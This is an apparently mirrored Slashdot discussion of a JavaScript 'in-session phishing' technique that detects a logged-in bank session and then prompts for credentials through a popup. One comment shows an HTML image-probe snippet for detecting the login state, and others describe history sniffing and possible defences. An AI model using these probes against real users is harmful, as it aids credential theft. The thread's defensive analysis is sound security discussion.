Slashdot Mirror


Phishing For Bank Info Without Any Pesky Malware

Emb3rz writes "DarkReading.com brings us news of a new approach to phishing that targets online banking sites. Here's the novel part of it: it doesn't involve any of the typical attack vectors we all know and love. Instead, it uses JavaScript from a remote page to detect if you have a banking site open, and prompts you for info via popup if you do."

232 comments

  1. The Best Defense is Offense by alain94040 · · Score: 3, Insightful

    This is real scary. And it goes to prove that bad guys always come up with new ways to steal. I don't believe there is a technical solution to this arms race.

    Instead, I'd love to see our law enforcement friends be more pro-active and setup traps. Pose as a fake victim. Go out and seek those phishing sites. When the thieves come after your money thinking they just ripped off a stupid Internet newbie, then you can trace their activity and catch them.

    That's the best way I can think of scaring the bad guys: when they never know if their next victim might be a cop.

    --
    FairSoftware.net -- work where geeks are their own boss

    1. Re:The Best Defense is Offense by Anonymous Coward · · Score: 2, Informative

      I've heard of something like this before.
      Though there's this magical thing called noscript.
      If people would stop putting law before them to prevent them from making stupid choices then we might have a more informed society.
      (I ironically didn't read TFA.)

    2. Re:The Best Defense is Offense by Anonymous Coward · · Score: 1, Insightful

      Unfortunately, the police can't do squat when the bad guy is operating out of Elbonia.

    3. Re:The Best Defense is Offense by X0563511 · · Score: 1, Troll

      The solution is to make the bad guys "disappear," not to seek out "justice."

      Why the hell would Elbonia care if some local scumbags show up dead in a gutter somewhere?

      --
      For large sets, this will be our guide even unto death, for the LORD will work for each type of data it is applied to...
    4. Re:The Best Defense is Offense by moderatorrater · · Score: 1

      Police have boundaries and borders. The internet, alas, does not.

    5. Re:The Best Defense is Offense by Anonymous Coward · · Score: 0

      Because what is illegal here may not be in Elbonia and vice versa. What if posting a Youtube link is illegal in Elbonia and they send someone here to make the guilty "disappear"?

    6. Re:The Best Defense is Offense by Anonymous Coward · · Score: 2, Funny

      Of course we would then have to send someone to Elbonia to disappear the disappearers.

      In fact we could lay traps for them by disappearing people in a country where that is illegal and then see who comes after them.

    7. Re:The Best Defense is Offense by eln · · Score: 4, Insightful

      Some of us like to believe that the Constitution, as well as all other laws and treaties the government operates under, restricts the government's actions everywhere that it operates, not just on American soil, and that it also precludes the government from encouraging other nations to do what it itself is prohibited from doing. I don't see how we can call ourselves a just nation if we simply outsource acts that we would find deplorable if our own government were carrying them out.

      I don't deny that our government has had something of a bad history of clandestinely encouraging foreign powers to "disappear" people we find troublesome, but that doesn't make it right or legal, and it certainly doesn't mean we should encourage it to happen more often.

    8. Re:The Best Defense is Offense by blueg3 · · Score: 3, Insightful

      Well, the nature of an arms race is such that it has technological approaches.

      In this case, for example, there most certainly is a technological approach. JavaScript in one loaded tab in your browser should have no shared knowledge with other tabs in your browser. Data separation needs to be enforced at a finer level. You should also know, if you have two tabs open to different sites, which one of the two a popup is associated with.

    9. Re:The Best Defense is Offense by retech · · Score: 2, Interesting
      There's a simple technical solution to this:
      1. trace the phishing to their location
      2. send a missile to that location
      3. problem solved
    10. Re:The Best Defense is Offense by Anonymous Coward · · Score: 1, Interesting

      Is that what Interpol is supposed to be doing? But if I recall right, they are doing a lot of work on getting fans to stop downloading music. Why don't they arrest the real criminals? :(

    11. Re:The Best Defense is Offense by calmofthestorm · · Score: 1

      No but we can request that they be extradited or, failing that, tried there, for the crimes that are illegal in their own country.

      --
      93rd rule of Slashdot: No matter how obvious my sarcasm is, my comment will be taken seriously by someone.
    12. Re:The Best Defense is Offense by Dasher42 · · Score: 1

      I've got a question. Where did the parent say anything about "disappearing" anybody? Instead I thought that was a good approach to finding and prosecuting phishers of this variety.

    13. Re:The Best Defense is Offense by azenpunk · · Score: 1

      You know, I used to wonder if a malware site could look across into another tab and look at what I was typing. Guess I'm closing the browser and restarting a single tab to do banking stuff now.

    14. Re:The Best Defense is Offense by calmofthestorm · · Score: 1

      Duh, it's where the American tubes are joined to the Elbonian tubes

      --
      93rd rule of Slashdot: No matter how obvious my sarcasm is, my comment will be taken seriously by someone.
    15. Re:The Best Defense is Offense by Gerzel · · Score: 4, Interesting

      Problem is with no-script you still have to decide if you trust or not-trust the site and if that level of trust you have is worth what the site is offering.

      If the site offers a useful service which requires scripts you have to decide if it is worth the risk.

      While in most cases it is easy to tell and block only those sites you trust. Those that you don't block may also allow third party scripts to be run such as in ads on the site.

    16. Re:The Best Defense is Offense by Gerzel · · Score: 2, Funny

      Elbonia uses trenches as we cannot afford your extravagant tubes.

    17. Re:The Best Defense is Offense by Gerzel · · Score: 3, Funny

      4. Find out that the phishers are using a proxy to bounce off of.
      5. Find that proxy is some poor schmuck who got hacked.
      6. Realize poor schmuck is you.
      7. Boom.

    18. Re:The Best Defense is Offense by Gerzel · · Score: 1

      There is no money coming to arrest real criminals.

    19. Re:The Best Defense is Offense by Anonymous Coward · · Score: 0
      There's a simple technical solution to this:
      1. trace the phishing to their location
      2. send a missile to that location
      3. problem solved

      Except that you'd end up bombing schools and hospitals, even if you get the tracing right, because that's where the phishers will move then. And their host country would probably declare war, and/or support more terrorists attacking Americans where ever...

    20. Re:The Best Defense is Offense by Anonymous Coward · · Score: 0

      Constitutions are laws of the state, so, as any other state law, they just cover that state's territory, so your belief is quite wrong.

      Also, all countries do have information services and agencies (CIA and NSA in the US, MI5 and MI6 in the UK, DIS, AISE and AISI in Italy, and so on... and many others we probably don't even have knowledge of, like what Gladio was in Italy), just to do what they should or could not do if they just respected the laws.

    21. Re:The Best Defense is Offense by Anonymous Coward · · Score: 0

      Yeah, those Russian & Chinese guys are shaking in their chapkas about the FBI all right.

    22. Re:The Best Defense is Offense by ushering05401 · · Score: 5, Funny

      There's a simple technical solution to this:

            1. trace the phishing to their location
            2. send a missile to that location
            3. problem solved

      I don't get it. Then the bad guys would have a missile. That is worse, not better.

    23. Re:The Best Defense is Offense by macraig · · Score: 1

      This is precisely the sort of evolutionary cat-and-mouse game that is likely to lead to the first true artificial intelligence. It won't be some well-meaning altruistic researcher in some AI lab, it will evolve out of this cyber-warfare.

    24. Re:The Best Defense is Offense by ushering05401 · · Score: 1

      Is that what Interpol is supposed to be doing? But if I recall right, they are doing a lot of work on getting fans to stop downloading music. Why don't they arrest the real criminals? :(

      Interpol doesn't really work like that.

      Each member country has an NCB (basically a central office) staffed by their own agents that can escalate issues through Interpol. So if Interpol is looking at piracy, then that started within a member nation's NCB, was escalated, and was deemed a valid cause by enough other member nations to become an agenda item. Furthermore, the only part Interpol would be interested in is assisting the actual enforcement officers in sharing information with other participating member nations, or facilitating training for participating members that do not have the resources to pursue a particular class of crime.

      Interpol is an organization composed of 'Secretary General' types and special counsels. They only facilitate cooperation and are relatively poorly funded these days.

      There is another organization known as the International Police that are actually police who arrest people, but they only operate in areas without the capability to raise a police force (ie: war torn countries).

    25. Re:The Best Defense is Offense by rolfwind · · Score: 1

      No idiot. The Constitution defines the US Government and therein always binds the US Government when it acts, no matter what, where, or when. At least that's the theory.

      Just because the government is acting outside of state boundaries, doesn't give it the means to do whatever the hell it pleases.

    26. Re:The Best Defense is Offense by thetartanavenger · · Score: 2, Informative

      NoScript breaks my online banking. Yeah it's a good idea and I tried to use it for a while, but I found that no matter what exceptions I gave it when it came to my bank, it refused to allow me access. Don't know why, but it kinda kills your argument if you have to turn NoScript off completely to use your online banking.

      --
      Who need's speling and grammar?
    27. Re:The Best Defense is Offense by DigitAl56K · · Score: 4, Informative

      Problem is with no-script you still have to decide if you trust or not-trust the site and if that level of trust you have is worth what the site is offering.

      That slightly over-simplifies the protection that NoScript offers. For example, even when you allow script to run NoScript still provides protection against certain types of XSS, you can use it to force cookies to be exchanged over https for certain domains, it can block some plug-in types (Java, Flash, Silverlight), it features click-jacking protection, and just a couple of days ago it even added protection against attacks on twitter.

      So yes, you do have to make that trade-off, but even when you click "allow" you're potentially better off with NoScript installed than without it.

    28. Re:The Best Defense is Offense by ZygnuX · · Score: 1

      I don't know if your post deserves +1 Funny, +1 Interesting, +1 Insightful or what...

      But you really deserve some modding up!

    29. Re:The Best Defense is Offense by Cigarra · · Score: 1

      Police have boundaries and borders. The internet, alas, does not.

      Well that's correct... for a while. As in any "new territory", there's a time for anarchy and (maybe) chaos, free-for-all and stuff. During that period, it's jungle law. Lots of wounded, and a few winners.

      Then of course comes the Reaction, and the Usual Powers settle in. This book explains it pretty well.

      --
      I don't have a sig.
    30. Re:The Best Defense is Offense by locofungus · · Score: 1

      This is real scary. And it goes to prove that bad guys always come up with new ways to steal. I don't believe there is a technical solution to this arms race.

      A good start would be for banking sites to work with Javascript turned off, and, maybe, even suggest you turn off Javascript while using online banking.

      Requiring you to turn it _ON_ is insane, but extremely common.

      Tim.

      --
      God said, "div D = rho, div B = 0, curl E = -@B/@t, curl H = J + @D/@t," and there was light.
    31. Re:The Best Defense is Offense by N1AK · · Score: 5, Insightful

      Slashdot: Where fining people for copyright infringement is wrong but killing people for stealing login details is "Insightful".

    32. Re:The Best Defense is Offense by LingNoi · · Score: 1

      Those damn lefties!

      Simple solution, take the job as an Elbonian diplomat and then do what you want!

    33. Re:The Best Defense is Offense by garett_spencley · · Score: 1

      AFAIK tabs are really just windows. The difference is how they're displayed by the GUI. But from a Javascript POV the tab is just another window. So if we start limiting the knowledge that javascript has over other windows then we prevent a lot of useful, legitimate things that can be done with other windows. For example: I have a few web-apps that use pop-up windows in a non-annoying way (ie: you click something to open the window that actually performs a useful task).

      At first glance I like the idea of preventing cross-domain knowledge, but then you still run into problems across same-site domains like static.yourdomain.com and script.yourdomain.com etc.

      I think the best defense against this attack is to use a separate browser session for banking. Banks should educate their users about this type of attack and make it very clear that they should close their browser and open up a new one, with no other sites open, just for their banking.

    34. Re:The Best Defense is Offense by gadget+junkie · · Score: 1

      [...]While in most cases it is easy to tell and block only those sites you trust. Those that you don't block may also allow third party scripts to be run such as in ads on the site.

      As far as I know, from using NoScript on Firefox, I can enable Java on my bank's page and it still blocks ads and JavaScripts if they come from other sources. From the NoScript home page: "The NoScript Firefox extension provides extra protection for Firefox, Flock, Seamonkey and other mozilla-based browsers: this free, open source add-on allows JavaScript, Java, Flash and other plugins to be executed only by trusted web sites of your choice (e.g. your online bank), and provides the most powerful Anti-XSS protection available in a browser."

      --
      "If a boss demands loyalty, give him integrity. But if he demands integrity, give him loyalty." (John Boyd, 1927-1997)
    35. Re:The Best Defense is Offense by RonTheHurler · · Score: 5, Interesting

      How about this one-

      I got a letter in the mail (usps snailmail) from Bank of America asking for a lot of personal information that was missing from my account, and that if I didn't supply that information they'd have to report me to the IRS.

      The letter was spelled correctly, had proper grammar and even had the BofA logo printed in full color. The return address was a PO box in Dallas. Nothing fishy at all.

      Problem is, I don't have a BofA account. But I'm sure a LOT of other people do.

      Phishing - it's not just an on-line phenomenon.

    36. Re:The Best Defense is Offense by Goaway · · Score: 1

      Well, I guess if you do that enough times, you've solved the botnet problem.

      Do you have enough missiles, though?

    37. Re:The Best Defense is Offense by Anonymous Coward · · Score: 0

      "Instead, I'd love to see our law enforcement friends be more pro-active and setup traps. Pose as a fake victim. Go out and seek those phishing sites. When the thieves come after your money thinking they just ripped off a stupid Internet newbie, then you can trace their activity and catch them."

      That would be nice. IF the cretins were in the U.S.

      U.S. jurisdiction stops at its borders.

    38. Re:The Best Defense is Offense by aeroswift · · Score: 1
      Sounds nice and simple in theory, but is it? If tracing was that simple, this article probably wouldn't exist.

      Or maybe I'm overestimating the bad guys.

      --
      No comment available.
    39. Re:The Best Defense is Offense by Anonymous Coward · · Score: 0

      The police aren't going to be able to do a thing due to the sheer numbers of victims.

      Reason?

      You. Can't. Fix. Stupid.

    40. Re:The Best Defense is Offense by indi0144 · · Score: 2, Interesting

      Call your bank! tell em you're going to the media as in "halp-my-buntu-box-does-not-do-word" unless they fix that. Happened here on my bank, they required IE 7 and I (and other fellow local geeks) called and emailed them so now they support Opera and Firefox.

    41. Re:The Best Defense is Offense by Muad'Dave · · Score: 4, Insightful

      Maybe "you" do, and you don't know it. I think it would be prudent to call BoA, tell them what you received, and make sure someone isn't laundering money using an account opened with your SSN, name, or address.

      --
      Tiller's Rule: Never use a word in written form that you've only heard and never read. You will end up looking foolish.
    42. Re:The Best Defense is Offense by redxxx · · Score: 1

      Why the hell would Elbonia care if some local scumbags show up dead in a gutter somewhere?

      Then they won't get any Baksheesh from the local businessmen.

    43. Re:The Best Defense is Offense by Anonymous Coward · · Score: 0

      You can.. the UN does not give a fucking heck if You do it. Neither the rest of the world.

    44. Re:The Best Defense is Offense by blueg3 · · Score: 2, Informative

      When you're currently visiting one site, and open a new tab and go to a different site, those two open tabs should have no capacity to share information -- they should function as if they were separate browser sessions. (Obviously this isn't the same as if you clicked on something in a tab that causes another tab or window to open, as they may need to share knowledge. But then, the fact that those two tabs/windows are tied to the same context should be made apparent to the user.)

    45. Re:The Best Defense is Offense by Anonymous Coward · · Score: 0

      The browser Galeon could be set to force ALL pop-ups to appear as new tabs instead of in new windows. That way, there is always a URL associated with the content (and they can't take over your screen).

    46. Re:The Best Defense is Offense by Anonymous Coward · · Score: 0

      I've lost all faith in Interpol since they helped to stage the "reyes-laptop-gate", the only consumer-grade Toshiba laptop that can stand a 500 lb bomb explosion unscratched.

      http://www.borev.net/2008/03/raul_reyes_amazing_laptop_of_m.html

    47. Re:The Best Defense is Offense by The+Moof · · Score: 1

      NoScript offers per-domain blocking. If your bank's website is the one serving the malicious scripts, something tells me NoScript isn't going to stop the attackers from stealing your information...

    48. Re:The Best Defense is Offense by hesaigo999ca · · Score: 1

      Well, we are those fake victims to them; the banks use us as bait, and we let them (as if we could bring them to court to not allow this; we would have to prove they do this, and then provide an alternative, that way we show there is an option). Anyway, the banks never really want to use an account of theirs for that, because they don't have to, whereas you have to use yours to access your online banking, and the chances that you are stung are 1 in 1000 (about)... so they wait for that 1 in 1000, then they wait to see if you notice that extra 1.25 charge, then if you do, they reimburse you, and it ends there (although they log the call), and if enough of the same type of call is being logged, then they get the expert to take a look, and they find a new attack vector, or new scam.

      It is very sad, as I have friends in the banking business, and they all say that accountability ends up last on the list, budget being the first.

    49. Re:The Best Defense is Offense by hesaigo999ca · · Score: 1

      Irony of online banking is most don't work without javascript enabled.

    50. Re:The Best Defense is Offense by Kindaian · · Score: 1

      Yes, but you aren't plagued by CSS... ;)

    51. Re:The Best Defense is Offense by RonTheHurler · · Score: 1

      Yes, that's a possibility, but my SSN was exactly what was being asked for, along with birthday and some other stuff. Your name and address are easily available to just about anyone. Most of us who own property have our names, addresses and other "private" information on-line on county web sites, available to anyone who wants to search them.

      I run a small business, and it's amazing how many of my customers have been able to look-up my home address, home phone number and such using public tax record, real estate and utility company data.

      It's no wonder that identity theft is such an easy crime. Keeping your SSN private is like having a password that you can never change. Security by obscurity, but for your life and your financial reputation.

      Phishing is only one point of vulnerability. I fear this problem is only going to get worse until we find a better way. Who's working on this anyway?

    52. Re:The Best Defense is Offense by Kindaian · · Score: 1

      If NoScript broke your online banking, then prolly your bank needs a new site! ;)

    53. Re:The Best Defense is Offense by nabsltd · · Score: 1

      Then, there's the Citibank credit card site, which doesn't work with Firefox if scripting is enabled, but gives full functionality (although without drop-down menus, etc.) if scripting is disabled.

      On the other hand, that site works fine with IE with scripting enabled.

    54. Re:The Best Defense is Offense by oliderid · · Score: 1

      Well, sorry to be so ignorant but How does the hacker place his piece of HTML code into the HTML code of the bank web site?

      As far as I know :

      • there is no way you can access the content or location of another tab.
      • There is no way your javascript could access another page it didn't create or isn't part of.
    55. Re:The Best Defense is Offense by SBrach · · Score: 1

      You're the first person I have seen use "fuck" and "heck" in the same sentence.

    56. Re:The Best Defense is Offense by Anonymous Coward · · Score: 0

      Agreed. It should be "Informative". Obviously.

    57. Re:The Best Defense is Offense by charlesj68 · · Score: 1

      I think it would be prudent to call BoA, tell them what you received, and make sure someone isn't laundering money using an account opened with your SSN, name, or address.

      Or, failing that, at least turn it over to a Postal Inspector.

    58. Re:The Best Defense is Offense by Anonymous Coward · · Score: 0

      There's a reason that the feds require credit reporting companies to give you a free report every year.

    59. Re:The Best Defense is Offense by severoon · · Score: 1

      I read about a law enforcement organization that tried to do exactly what you're suggesting. They got taken for hundreds of thousands of dollars.

      --
      but have you considered the following argument: shut up.
    60. Re:The Best Defense is Offense by dotgain · · Score: 1
      But who will disappear the disappearers who disappear the disappearers?

      If disappearing is outlawed, only outlaws will disappear.

    61. Re:The Best Defense is Offense by Anonymous Coward · · Score: 0

      And that is annualcreditreport.com not freecreditreport.com which is not free

    62. Re:The Best Defense is Offense by Muad'Dave · · Score: 1

      Very good point, I forgot that snail mail has people who take fraud via their medium quite seriously. I wish that were the case universally *cough*Internet*cough* *cough*Telephone*cough*.

      --
      Tiller's Rule: Never use a word in written form that you've only heard and never read. You will end up looking foolish.
    63. Re:The Best Defense is Offense by indian_rediff · · Score: 1

      I can attest to this. I have received a similar snail mail letter from First Union. I had opened an account many moons ago - when they were still called First Fidelity. I changed my bank for unrelated reasons and closed my account, my overdraft account, my business' account and my safe deposit account. All fine.

      Suddenly they decided to charge me fees for the overdraft account - about 8 years after I had closed it.

      I called them and they found that internally, they had just moved their data from an old system to a new system.

      Initially I was absolutely petrified that someone had stolen my identity. Fortunately, the phone call proved that my concerns, although valid, were unnecessary.

      The reason for the problem was the integration of First Fidelity's accounts into the new system.

      I would hazard that something similar may have happened - some bank acquired by BofA had data that got onto the new BofA system and triggered the alert.

      --
      All views my own. Anyone else with the same views needs to have his/her head examined.
    64. Re:The Best Defense is Offense by slash.duncan · · Score: 1

      The problem is likely that the banking site is on one domain, say online.bankofjoe.com, but running a script from another, say scripts.bankofjoe.com. Then there's cookies that may be bankofjoe.com or online.bankofjoe.com, and if it's the former, they may be set by a third domain, login.bankofjoe.com or the like.

      The trick with cookie/script/java/plugin permissions is to figure out exactly which domains need permission to run or deliver their cookie or whatever, and allow it for them, without simply turning on allow all. With scripting at least, there's another extension that helps in this regard, JSView, intended to allow listing and viewing of all external CSS and scripts. The listing is key here, as it allows one to see exactly where they all come from, and (tho it probably doesn't apply to banking) then tell NoScript to allow the appropriate domains one wants, without allowing that script from adtracker.com or whatever.

      One more troubleshooting trick that helps is to turn off auto-forwarding. It's quite common for bank and other "personal info" (tax, insurance, etc.) sites to forward you from one domain to another (login, onlineid, the main online site, billpay, etc.), thru several domains in a single session. Some of those (say onlineid, above) may be immediately forwarded thru, so you don't actually see them in the address bar and know to unblock them unless you turn off auto-forwarding. That way, the click from login that takes you thru onlineid to the main site stops at onlineid, giving you a chance to say "Oh, /that's/ the one I need to unblock." This was what did the trick at a tax site I was using a few years ago, with Konqueror. I could get it working with Mozilla (I think it was Mozilla, now SeaMonkey, not Firefox, as I think it was before Firefox), but not Konqueror, unless I turned scripting on for everything in Konqueror. After I disabled auto-forwarding, I ended up at an intermediate domain that I didn't know anything about until then. After I added appropriate permissions for it, everything "just worked".

      --
      Duncan
      "Every nonfree program has a lord, a master,
      and if you use the program, he is your master."
      R Stallman
    65. Re:The Best Defense is Offense by plantman-the-womb-st · · Score: 1

      I've got a question. Where did the parent say anything about "disappearing" anybody?

      The solution is to make the bad guys "disappear," not to seek out "justice." Why the hell would Elbonia care if some local scumbags show up dead in a gutter somewhere?

      Um, right there? You know, the ENTIRE post?

      --
      Say bad words about my book, in cold oatmeal, or I shall sue!
    66. Re:The Best Defense is Offense by ushering05401 · · Score: 1

      I had never read about that. Interesting link.

    67. Re:The Best Defense is Offense by Anonymous Coward · · Score: 0

      *lock & load*

      You sure?

    68. Re:The Best Defense is Offense by Anonymous Coward · · Score: 0

      Loose Change.

    69. Re:The Best Defense is Offense by galego · · Score: 1

      Exactly, the browser's history is not protected per tab, but is globally accessible by all tabs (and their js) AFAIK. The browser-maker has to figure out how to balance the security of the tab versus the convenience of a global history for the user. As I understand it, the only piece of info needed here is your history ... nothing from your banking site tab itself. So ... it's a question of whether or not the history can be "stove-piped" and protected as tab information as far as js is concerned.

      For that matter though ... I'd be fine with banning js from having access to browser history at all. I don't think the trade-off is worth it in the end. Would break a lot of stuff out there I'm sure (well ... none of my stuff).

      --

      Que Deus te de em dobro o que me desejas

      [May God give you double that which you wish for me]

    70. Re:The Best Defense is Offense by blueg3 · · Score: 1

      I suppose browser history would work, too. The attack described here actually uses a login test. The attacker's website includes a piece of JavaScript that routinely tries to access a page (or other Web-accessible item) that requires you to be logged in to the particular banking site to access. (Say, for example https://my.bank.com/account_summary.html.) It tests for failure/success and, if successful, pops up a dialog.

      Beyond the fact that user should be able to tell, visually, what page the dialog is associated with, random-attacker's page shouldn't be able to access content on your bank as if you were logged in. It should have no way of knowing what the rest of your browser is doing. Noticing the bank in your history would be one way of seeing that you are or recently were logged in. In this case, the login test described works because session cookies, used to track a login session, are global in the browser. While the attacker can't easily access the cookie itself, it can (as described) test to see if it exists and is valid. With an ideal design, random-attacker's page would not only not have access to the cookie, but not have access to the *side effects* of having the cookie.

  2. XSS by AKAImBatman · · Score: 4, Informative

    Here's the novel part of it: it doesn't involve any of the typical attack vectors we all know and love.

    A cross-site scripting attack sounds like a pretty typical attack vector to me. Javascript should not be able to "detect" if they have a banking site open. Pure and simple.

    1. Re:XSS by AKAImBatman · · Score: 5, Insightful

      BTW, for those of you who are curious about this attack (and are too lazy to RTFA), this basically uses a common image set behind a protected login. e.g.

      <img src="https://www.mybank.com/protected/images/lock.gif" onerror="notLoggedInSoRefresh();" onload="hahaGotEm();">

      If you ping the blasted thing for long enough, you will be able to detect the user logging in. One pop-up later and you've stolen their info.

      Now protecting against this sort of issue is an interesting question. Ideally static resources should never be behind closed doors. But that answer is a bit of a cop-out. The next best thing is to ensure that session cookies are maintained inside the login tab ONLY and that persistent cookies are not used for auto-login.

      (Interesting question: I wonder if Chrome is vulnerable? With process isolation, this trick would require that the main Chrome process delegate the handling of session cookies. Which seems like a bad idea anyway, so I would hope they implemented the browser in a more secure manner.)

    2. Re:XSS by camperdave · · Score: 1

      Wouldn't this mean they'd have to ping every bank? If I bank at www.otherbank.com, loading anything from www.mybank.com isn't going to get them very far. Now, if they sniffed my temp folder for lock.gif or other footprints... that might work.

      --
      When our name is on the back of your car, we're behind you all the way!
    3. Re:XSS by Culture20 · · Score: 1

      It doesn't take them any more time to "ping" the top 20 banks than it would just one. It's all done by your browser on your machine in response to a web page. It's just the difference of 20 img tags or just 1.

    4. Re:XSS by Animaether · · Score: 3, Interesting

      so wait..
      as you explain it, I guess the idea is that once the user logs into the secure site, the malware script can magically access the lock.gif because the site and browser tell them that.. yup.. the user is logged in and thus should have access.

      however.. presumably, the script is not from a page that's actually -on- https://www.mybank.com/.. if it was, you and the bank probably have bigger problems.

      So let's say that instead it's on http://www.malware.lol/ - why would a script on a page from malware.lol be allowed access to a resource - in this case 'pinging' the 'lock.gif' - *on* https://www.mybank.com/ ?

      Is there any valid purpose for allowing something like that? I can understand it for non-secure sites.. from inlining content that's hosted on another domain to allowing local applications to grab data off of e.g. websites that do not provide a nice API. But for secure sites? I'm baffled.

    5. Re:XSS by AKAImBatman · · Score: 5, Interesting

      So let's say that instead it's on http://www.malware.lol/ - why would a script on a page from malware.lol be allowed access to a resource - in this case 'pinging' the 'lock.gif' - *on* https://www.mybank.com/ ?

      There's a great deal of internet history behind this one. Originally, there were no barriers whatsoever. Anyone could link anything from any page. Of course, as Javascript entered the scene and grew in sophistication, this was soon realized to be a problem. As a result, most browsers adopted security behaviors for the really powerful stuff like XMLHttpRequest and locked out scripting across frames.

      However, that still leaves a hole like this one. And it's not an easy hole to plug. Quite a few sites are actually structured around the idea of cross-site linking. (e.g. The HTML may be www.mainsite.com while the images come from the web server media.mainsite.com.) Interestingly, this sort of structure is actually a solution to the problem posed. So it's difficult to dispose of it out of hand.

      Some of the web standards are moving toward highly restrictive models for HTTPS sites. e.g. HTTPS resources can only be accessed by pages whose origin is the same HTTPS site. More likely though, I expect to see more explicit security configurations along the lines of what Flash does. Flash uses a crossdomain.xml file on the target site to broadcast if a resource can be accessed or not. This scheme allows for situations like a media server separate from the primary site, but it also allows for those cross domain accesses to be tightly restricted.

      Of course, the scheme is not without its problems. Nothing prevents an attacker from transmitting information he may have collected TO a server that he has configured with a permissive policy file. If he finds a vulnerability that allows him to collect the information in the first place, he's going to be able to make off with the info scot-free.

      As a result, web security is an ongoing area of research. It's incredibly complex due to the nature and history of the web, but standards bodies are working hard to find more reliable solutions that don't negatively impact existing sites and current usage.

    6. Re:XSS by RockMFR · · Score: 2, Insightful

      There is nothing special about secure sites. HTTPS doesn't mean "this site is super special and you should do special things with it". This same attack can be applied to non-secure sites, too.

    7. Re:XSS by FalleStar · · Score: 1

      Looking for protected images is one of the ways that can be used to determine if the user is viewing the website; however there is another way apparently.

      As you can see IE, Firefox, Safari & Chrome are all included on the vulnerable list.

      NoScript will (as usual) keep you protected however.

    8. Re:XSS by hairyfeet · · Score: 2, Insightful

      And that one is JavaScript too. Has anyone else noticed that pretty much every piece of nasty coming down the pipe uses JavaScript? I've said it before and I'll say it again: JavaScript is a BAD Idea, just as ActiveX was a bad idea. They both are havens for malware. The only difference is ActiveX was Windows only. But in either case it is still a giant security hole. If this keeps up and enough folks are burned I could see it dying off just as ActiveX did.

      Now as for Noscript, while I use it every day it just isn't friendly for 99.999% of home users. What we need is a "simple" option setting for Noscript, perhaps set up by allowing the user to choose on first install, which instead of listing every single blockable element, would have a "play video" button which would look for *.flv, *.mp4, etc and play the video. Because it is video sites that have made Noscript useless for handing out to non techies. I have watched my customers and they quickly get frustrated because they can't figure out which of the dozen blocked elements is the video they want to see and soon start clicking "allow all on this page" which makes it as useless as Vista's UAC prompts. By having a "play video" option at the bottom you would still have the high security, since nothing is being run by default, but it would allow the non techs to play their videos without killing the security.

      --
      ACs don't waste your time replying, your posts are never seen by me.
    9. Re:XSS by kingcobra0128 · · Score: 1

      yeah that sounds about right :)

    10. Re:XSS by Anonymous Coward · · Score: 0

      This has nothing to do with XSS. RTFA.

    11. Re:XSS by Anonymous Coward · · Score: 0

      The defense is much simpler than changing the cookie model: Just give all resources which are only available after login a "salted" URL. So name the image "https://bank/image.jpg?salt=5937853240596428465135542" for that particular user and make it so that only salted URLs are dependent on log-in. The other page can't guess the salt, so it can't try to load the image to see if the user is logged in.

      Yes, this does break caching, but there are only two sensible options here: Either the availability of the image depends on a log-in, then it shouldn't be cached in the first place, or the availability does not depend on the log-in, then you shouldn't use salted URLs and the image should be available whether the user is logged in or not.

    12. Re:XSS by Anonymous Coward · · Score: 0

      This is complete cobblers.

      Linking of images on one site to display on another has nothing to do with cross-site scripting.
      The lock.gif image will still exist on the server whether you're logged in or not.

    13. Re:XSS by Anonymous Coward · · Score: 1, Informative

      The script doesn't access the image, it just gets the information that loading the image succeeded or resulted in an error. Third party images are a very common thing on the web. You may be able to find an option in your browser for disabling third party content (everything not coming from within the same domain/path as the HTML document holding it all together), but if you turn off third party content, many pages will stop working or miss lots of pictures (on the plus side, you won't be seeing many ads either).

      A naive approach would be to limit the events fired by the image (onerror and onload) to scripts which have the same origin as the image. That wouldn't stop the attack though, because images influence the layout: The script could test if the image has loaded by looking at pixel distances on the page. A similar attack can be used to see if you have visited a particular page within the time that your browsing history covers (usually 7-14 days). To do that, a script can look at the color of a link. If it's the color of visited links, you've been there. This attack does not load anything from the server, so it would be a useful pre-test to see if you actually use online banking and at which bank. Then the image loading detection routine only needs to be performed for that bank.

      In essence, if you do anything that you have to log in for, turn off your browsing history and browse like it's 1994: One page at a time, no tabs.

    14. Re:XSS by datadigger · · Score: 1

      The lock.gif image will still exist on the server whether you're logged in or not.

      It's not about whether or not the image (or any other element, it doesn't have to be an image) exists, but rather if the request for it will be honoured by the bank server.

      This scheme works for any request that is answered only when the user is logged in.

      --
      Aphorisms don't fix code. (Bart Smaalders)
    15. Re:XSS by Goaway · · Score: 1

      Has anyone else noticed that pretty much every piece of nasty coming down the pipe uses JavaScript?

      No, we haven't, because we don't have your confirmation bias.

    16. Re:XSS by Animaether · · Score: 2, Insightful

      "There is nothing special about secure sites. HTTPS doesn't mean "this site is super special and you should do special things with it". This same attack can be applied to non-secure sites, too." - RockMFR (1022315)

      Well that's the thing - why not? They are super special to my browser already.. doing its certificate check and throwing a big fat "passport check" image at me (FireFox 3) if it thinks something's not quite up to snuff. I don't see why a page on anything other than https://www.mybank.com/ shouldn't be told to piss off.

      "Quite a few sites are actually structured around the idea of cross-site linking. (e.g. The HTML may be www.mainsite.com while the images come from the web server media.mainsite.com.)" - AKAImBatman (238306)

      That I understand - as per my post, for inlining things etc.

      However, I think that in the specific case you mentioned - e.g. media.. presumably images - those images *should* either come from the same domain as the secure site *or* come directly from an insecure site. Yes, a browser will pop up a warning that there's mixed content.. it does that for a reason, I would think. But the way around that is not to stick your images on a completely different-but-still-secure domain (I've not actually seen this, so for all I know that throws up an error as well anyway), but by keeping things on the same domain. Any sysadmin worth their pay can easily offload resources to a different media server if there's some manner of capacity issue at play that would have them put the media on a different domain otherwise.

      Maybe making things more strict would indeed break a few sites, but other than webmasters/sysadmins realizing they need to be more careful, I don't see the harm in that other than short-term mumbling and cursing from the aforementioned groups.

      crossdomain directives sound like another security problem just waiting to happen, in my humble opinion, but I'm certainly not an expert on that topic.

    17. Re:XSS by the_one(2) · · Score: 1

      Maybe the bank should be secure so that all attacks fail? It isn't rocket science... (yes, it isn't easy either, but it has been solved)

    18. Re:XSS by Emb3rz · · Score: 1

      The PDF that is linked to in TFA states explicitly that this does not involve the use of 'protected' resources to determine if you are logged in or not. This is, in fact, a different vulnerability exposed by JavaScript.

      Link for the lazy: http://www.trusteer.com/files/In-session-phishing-advisory-2.pdf, page 2 paragraphs 3 and 4.

    19. Re:XSS by horatio · · Score: 1

      Has anyone else noticed that pretty much every piece of nasty coming down the pipe uses JavaScript?

      No, we haven't, because we don't have your confirmation bias.

